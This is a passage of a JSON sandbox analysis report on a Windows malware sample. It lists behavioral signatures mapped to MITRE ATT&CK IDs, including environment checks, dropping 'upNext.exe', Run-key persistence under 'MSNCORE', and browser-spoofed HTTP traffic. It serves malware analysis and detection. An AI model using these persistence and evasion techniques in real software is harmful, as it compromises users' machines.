PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263288'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262872'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263304'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262888'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263320'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262904'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263336'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262920'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263352'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262936'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263384'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262968'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263368'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262952'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263400'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262984'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263000'}\" (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadResource with parameter {'hModule': '2003959808', 'hResInfo': '5244400'}\" (UID: 00000000-00006072)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" renamed original file\"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" to \"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.del\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" renamed original file\"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" to \"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"BSS\" is zero\n Raw size of \".tls\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000001400000038fe23000d00000000005401d87e540138fe2300145c8c77435c8c77b2d5b8777b270000ec01540100005401500154013f000000ff070000500154017c3c0040000000002700390014000000006d390050015401c86f3900e07e54012000000021000000000000000d000000b86c3900d86d3900d8853c00807139000000000021000021c4005401dcfe230095e188779a371700000000007f0000009a2a8c7721000021c400540101000000000000000200000008000000e07e5401e07e5401db7e54010000000008fe23000000540154fe230168fd230002000000 (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006072)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"IsWow64Process\" with parameter \"6072\" - (UID: 00000000-00006072)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006072)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006072)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000028ff230058260400d8fe2300100000008cd3340090642500e07e54010000000090d334001000000038d611006d000000bc980400043d0400160000009640040016000000ee40040001940400cad9040028ff2300b540040034ff230090d3340038d611006d0000001600000019e00400 (UID: 00000000-00006072)\n \"upNext.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000028ff230058260400d8fe2300100000008cd34c0090643d00e07e63010000000090d34c001000000038d611006d000000bc980400043d0400160000009640040016000000ee40040001940400cad9040028ff2300b540040034ff230090d34c0038d611006d0000001600000019e00400 (UID: 00000000-00002104)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00006072)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-138", "type": 3, "relevance": 1, "name": "Queries for Borland Delphi related registry entry", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BORLAND\\DELPHI\\LOCALES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetVersion@kernel32.dll directly followed by \"cmp ax, 0004h\" and \"jc 00080776h\" at 41240-4291-000805C0\n Found API call GetVersion@KERNEL32.DLL directly followed by \"cmp ax, 0004h\" and \"jc 00080776h\" at 00000000-00006072-56654-3651-000805C0\n Found API call GetVersion@KERNEL32.DLL directly followed by \"cmp ax, 0004h\" and \"setnb byte ptr [0011DB38h]\" at 00000000-00006072-56654-3916-0009588C", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"FindFirstFileA\" with parameter C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.old (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"FindFirstFileA\" with parameter C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.del (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"FindFirstFileA\" with parameter C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"FindFirstFileA\" with parameter C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe (UID: 00000000-00006072)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1208028587\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"587270014\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1208028587\"\n \"cx\": \"0\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"Language\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"MSIE\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"must\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"brAccept\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"8859\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"7Content\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"Type\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"form\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" wrote 24912 bytes starting with PE header signature to file \"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a0000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" wrote 24912 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\upNext.exe\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a0000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"upNext.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp]- [targetUID: 00000000-00006072]\n \"DISMHOST.EXE.67A48282.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\upNext.exe]- [targetUID: 00000000-00006072]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MSNCORE\"; Value: \"%LOCALAPPDATA%\\upNext.exe --i\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" has section name CODE with entropy \"6.40173219649\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" has section name .reloc with entropy \"6.75219683931\"\n \"upNext.tmp\" has section name CODE with entropy \"6.40241689135\"\n \"upNext.tmp\" has section name .reloc with entropy \"6.75219683931\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has section name CODE with entropy \"6.40306254674\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has section name .reloc with entropy \"6.75219683931\"\n \"DISMHOST.EXE.67A48282.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A48282.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-22", "type": 7, "relevance": 10, "name": "Uses a browser-related user-agent without launching browser", "description": "Found user-agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" opened \"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" with delete access\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" opened 